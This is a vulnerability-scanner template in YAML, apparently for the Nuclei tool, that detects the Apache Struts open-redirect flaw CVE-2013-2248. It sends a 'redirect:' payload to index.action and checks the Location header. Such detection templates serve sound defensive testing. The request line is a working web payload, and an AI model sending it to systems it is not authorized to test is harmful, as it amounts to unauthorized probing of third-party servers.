29 lines
927 B
YAML
29 lines
927 B
YAML
id: CVE-2013-2248
|
|
|
|
info:
|
|
name: Apache Struts - Multiple Open Redirection Vulnerabilities
|
|
author: 0x_Akoko
|
|
severity: low
|
|
description: Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/38666
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2013-2248
|
|
- https://cwiki.apache.org/confluence/display/WW/S2-017
|
|
classification:
|
|
cve-id: CVE-2013-2248
|
|
remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later.
|
|
tags: cve,cve2013,apache,redirect,struts
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.action?redirect:http://www.example.com/"
|
|
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
|
part: header
|
|
|
|
# Enhanced by mp on 2022/02/21
|